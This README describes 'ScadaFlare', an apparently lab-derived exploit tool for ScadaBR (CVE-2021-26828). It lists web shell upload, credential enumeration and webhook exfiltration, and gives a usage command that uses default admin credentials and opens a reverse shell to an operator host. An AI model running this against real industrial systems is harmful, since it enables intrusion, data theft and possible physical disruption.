A modular post-auth RCE exploit targeting ScadaBR <1.1.0, enhanced for red team ops.
- Uploads weaponized
.jspshell viaview_edit.shtm - Supports Linux & Windows payloads
- SOCKS5 / HTTP proxy support
- Reverse shell trigger (standard or base64)
- Enumeration modules (DB, creds, Log4Shell, etc.)
- Webhook exfil (Slack / Discord)
- Metasploit resource script generation
- Cleanup support (kill switch)
| Phase | Technique | ID |
|---|---|---|
| Initial Access (post-auth) | Valid Accounts | T1078 |
| Execution | Exploit Public-Facing Application | T1190 |
| Command Execution | Web Shell | T1505.003 |
| Privilege Actions | Modify Web Content | T1505 |
| Credential Access | Credential in Configuration Files | T1552.001 |
| Discovery | Remote System Discovery | T1018 |
| Exfiltration | Exfiltration Over Web Service | T1567.002 |
| Defense Evasion | Proxy & Protocol Tunneling | T1090 |
- CVE-2021-26828
- Discovered by Fellipe Oliveira
- Exploit enhanced & modularized
This exploit was developed during analysis of the HTB Pro Lab: Alchemy scenario. The original PoC by Fellipe Oliveira was solid but:
Written in Python 2
Lacked modern features like proxy support, shell cleanup, enumeration chaining
Was difficult to extend or integrate into red team workflows
This version, ScadaFlare, is a full rewrite in Python 3 with modular support, multiple evasion strategies, OS detection override, webhook integration, SOCKS proxy support, and enumeration chains for real world operator use.
python3 scadaflare.py http://172.16.0.20:80 admin admin \
--reverse-ip 10.10.14.44 --reverse-port 4445 \
--verbose --cleanupScadaFlare is designed solely for:
- Ethical hacking education
- SCADA lab testing
- Defensive research & vulnerability validation
Unauthorized use against real industrial systems can:
- Disrupt physical processes
- Cause damage or safety hazards
- Result in severe legal consequences
By using this tool you accept full responsibility for:
- Obtaining explicit written authorization
- Operating only within approved environments
MIT License – see LICENSE
